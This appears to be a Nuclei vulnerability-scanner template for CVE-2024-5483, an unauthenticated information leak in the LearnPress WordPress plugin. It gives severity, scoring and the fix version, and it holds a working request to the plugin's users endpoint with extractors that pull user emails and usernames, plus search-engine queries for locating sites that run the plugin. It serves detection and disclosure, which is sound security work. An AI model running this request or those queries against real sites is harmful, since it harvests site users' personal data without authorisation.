id: CVE-2024-5483 info: name: LearnPress < 4.2.6.8.1 - Information Disclosure author: pussycat0x severity: medium description: | LearnPress – WordPress LMS Plugin contains a sensitive information exposure caused by incorrect implementation of get_items_permissions_check function in all versions up to 4.2.6.8, letting unauthenticated attackers extract user emails and basic information. impact: | Unauthenticated attackers can access sensitive user information, including emails, leading to privacy breaches. remediation: Update to version 4.2.6.9 or later. reference: - https://wpscan.com/vulnerability/1f253156-333b-4be6-b727-06237567be1e/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-5483 epss-score: 0.05516 epss-percentile: 0.90397 cwe-id: CWE-200 metadata: verified: true max-request: 2 vendor: thimpress product: learnpress framework: wordpress publicwww-query: "/wp-content/plugins/learnpress/" fofa-query: body="/wp-content/plugins/learnpress/" shodan-query: http.html:"/wp-content/plugins/learnpress/" tags: cve,cve2024,wordpress,wpscan,wp-plugin,learnpress,vuln,info-leak http: - method: GET path: - "{{BaseURL}}/wp-json/learnpress/v1/users" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "application/json")' - 'contains_all(body, "id","email","username","email")' condition: and extractors: - type: regex name: user_email part: body regex: - '"(?:email|user_email)"\s*:\s*"([^"@]+@[^"]+)"' group: 1 internal: true - type: regex name: username part: body regex: - '"(?:username|user_login)"\s*:\s*"([^"]+)"' group: 1 internal: true - type: dsl dsl: - "'Username: ' + username" - "'Email: ' + user_email" # digest: 490a00463044022079f1e5fde98fc5241b84510cb8302999a80fcf9536a8acd55b556f5d6935c49c0220568412b92f129a97f34ca1f928def99652788fc27c3f76709255eafa70ebddbc:922c64590222798bb761d5b6d8e72950